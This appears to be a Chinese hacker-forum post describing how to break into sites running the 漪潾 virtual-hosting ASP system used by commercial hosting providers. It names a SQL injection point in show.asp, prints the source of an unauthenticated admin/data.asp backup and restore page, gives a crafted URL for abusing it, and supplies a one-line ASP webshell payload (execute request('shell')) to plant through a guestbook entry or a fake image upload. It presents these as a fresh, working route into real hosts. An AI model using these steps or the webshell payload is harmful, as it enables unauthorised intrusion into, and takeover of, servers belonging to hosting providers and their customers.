文章作者:llikz
现在我们是很难再找到免费申请支持脚本语言的空间了!!
谁叫现在是经济时代吗??不过心理还是很郁闷的,花200多块钱买个空间加国际域名
真的有点不划算,可是天上从不掉馅饼,呵呵
于是我在网上转了转,呵呵,好象所有的空间提供商都是用的一个版本的程序把
呵呵,有戏,于是我就在网上搜虚拟主机程序,找到了漪潾虚拟主机系统这个版本的asp程序,废话少说,立即就装到了我的机子上,呵呵,爽死了,那些空间提供商用的就是这套程序,慢慢研究把,于是我就随便在着个程序的网页上看了看,对 asp程序
,尤其是access版本的没有什么很大的注入点,刚开始我就是这么想的,很快就在
show.asp?id=23这个网页上找到注入点,就算我门知道表名,字段名,帐号和密码也是白费工夫,因为他的密码是md5加了密的,而且登陆是session认正的根本无法进行
cookie欺骗,郁闷呀!!!???????如果他的数据库是sql的就好了,少痴心妄想了,呵呵,(后来我发现最新的版本也存在这个注入点,如国对方使用的是sql比死无移把?)
不能放弃,于是我就在admin文件夹中看了看,他的所有程序都进行session认证了,不好直接进入,一不小心我发现其中有个data文件,很是怪异,我载了下来:
<!--#include file ="conn.asp"-->
<title>--管理页面</title>
<link href="main.css" rel="stylesheet" type="text/css">
<meta NAME=GENERATOR Content="Microsoft FrontPage 3.0" CHARSET=GB2312>
<BODY leftmargin="0" bottommargin="0" rightmargin="0" topmargin="50" marginheight="0" marginwidth="0" bgcolor="#B6C6F3">
<%
dim action
dim admin_flag
action=trim(request("action"))
dim dbpath,bkfolder,bkdbname,fso,fso1
select case action
case "CompressData" '压缩数据
dim tmprs
dim allarticle
dim Maxid
dim topic,username,dateandtime,body
call CompressData()
case "BackupData" '备份数据
if request("act")="Backup" then
call updata()
else
call BackupData()
end if
case "RestoreData" '恢复数据
if request("act")="Restore" then
Dbpath=request.form("Dbpath")
backpath=request.form("backpath")
if dbpath="" then
response.write "请输入您要恢复成的数据库全名"
else
Dbpath=server.mappath(Dbpath)
end if
backpath=server.mappath(backpath)
Set Fso=server.createobject("scripting.filesystemobject")
if fso.fileexists(dbpath) then
fso.copyfile Dbpath,Backpath
response.write "成功恢复数据!"
else
response.write "备份目录下并无您的备份文件!"
end if
else
call RestoreData()
end if
case "SpaceSize" '系统空间占用
call SpaceSize()
end select
conn.close
set conn=nothing
response.write"</body></html>"
他并没有进行认证,爽级了,哈哈!!!!!!!!!
我们立即构造防问地址
www.target.com/admin/data.asp?action=BackupData
哈哈,奇迹发现了,我们立即得到了他的数据库地址,和其他的利用数据,而且得到了backup数据库的权限呀,呵呵,如果他的网站上又装了论坛我门就可以直接上传
假图片得到个webshell,呵呵我们也可以将asp代码写到他的数据库里,比如留言
<% execute request("shell") %> 到此为止我门已经的得到webshell!!!!
这可是最新的漏洞呀,希望大家不要搞破坏呀!!!
有疑问的加我QQ:66734111
(黑盟的也是这个系统,也存在这个注入点,请尽快修复!!)
